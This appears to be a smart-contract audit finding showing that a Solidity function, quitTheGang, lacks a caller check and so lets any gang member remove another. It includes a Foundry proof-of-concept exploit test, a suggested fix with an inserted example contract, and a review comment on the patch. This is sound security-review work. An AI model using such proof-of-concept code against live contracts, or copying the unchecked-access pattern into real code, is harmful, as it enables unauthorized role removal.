Description
Gang members can quit the gang by calling Laundrette::quitTheGang(address account). However, the function does not verify that account is the msg.sender, so any gang member can kick any other member out of the gang.
Vulnerable Code
function quitTheGang(address account) external onlyRole("gangmember") {
    kernel.revokeRole(Role.wrap("gangmember"), account);
}
Proof of Concept:
The following Foundry test demonstrates the issue: Alice removes Bob from the gang, after which Bob's own call reverts.
pragma solidity 0.8.24;

import "./Base.t.sol";

contract AttackTest is BaseTest {
    function test_GangMemberCanKickAnyOtherMember() public {
        address alice = makeAddr("Alice");
        address bob = makeAddr("Bob");
        address godFather = kernel.executor();

        // Setup: the GodFather gets the role and adds Alice and Bob to the gang.
        vm.prank(kernel.admin());
        kernel.grantRole(Role.wrap("gangmember"), godFather);
        vm.startPrank(godFather);
        laundrette.addToTheGang(alice);
        laundrette.addToTheGang(bob);
        vm.stopPrank();

        // Alice, an ordinary member, revokes Bob's role.
        vm.prank(alice);
        laundrette.quitTheGang(bob);

        // Bob no longer holds the role, so his own call reverts.
        vm.prank(bob);
        vm.expectRevert();
        laundrette.quitTheGang(bob);
    }
}
Impact
Any gang member can kick other gang members out of the gang.
Tools Used
Foundry, Manual Review
Recommendations
Modify the function to include access control, so only the member themselves or the GodFather can revoke the access of the gang member.
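One way the access check described in this recommendation could look, as an added example that is not part of the original report or the audited code base. It assumes a local role mapping and a godFather address in place of the page's kernel, and the body of isAuthorizedOrRevert is hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.24;

// Added example, not the audited contract. Roles live in a local mapping here
// (assumption) instead of the page's kernel, so the file compiles on its own.
contract HardenedLaundrette {
    address public immutable godFather;           // stands in for kernel.executor()
    mapping(address => bool) public isGangMember; // stands in for the "gangmember" role

    error NotGangMember(address caller);
    error NotAuthorized(address caller, address account);

    constructor() {
        godFather = msg.sender;
        isGangMember[msg.sender] = true; // the PoC also grants the role to the GodFather
    }

    modifier onlyGangMember() {
        if (!isGangMember[msg.sender]) revert NotGangMember(msg.sender);
        _;
    }

    // Hypothetical body for the modifier named in the recommendation:
    // the caller must be the account being removed, or the GodFather.
    modifier isAuthorizedOrRevert(address account) {
        if (msg.sender != account && msg.sender != godFather) {
            revert NotAuthorized(msg.sender, account);
        }
        _;
    }

    // Assumption: only the GodFather adds members, as in the PoC.
    function addToTheGang(address account) external {
        if (msg.sender != godFather) revert NotAuthorized(msg.sender, account);
        isGangMember[account] = true;
    }

    // A member calling this for another member is rejected by
    // isAuthorizedOrRevert; self-removal and the GodFather pass both checks.
    function quitTheGang(address account)
        external
        onlyGangMember
        isAuthorizedOrRevert(account)
    {
        isGangMember[account] = false;
    }
}
```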
- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
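Review bot: the added line applies isAuthorizedOrRevert(account), but the patch does not show that modifier's definition, so it cannot be confirmed from this change that it enforces "msg.sender is account or the GodFather" as the recommendation states. Include the modifier body in the fix and add a test in which one member calls quitTheGang on another member and the call reverts. Also note that onlyRole("gangmember") is kept on the function, so the GodFather can only remove a member while also holding the gangmember role, which the PoC grants explicitly via kernel.grantRole; if the GodFather is meant to remove members without that role, the two checks need to be combined rather than stacked.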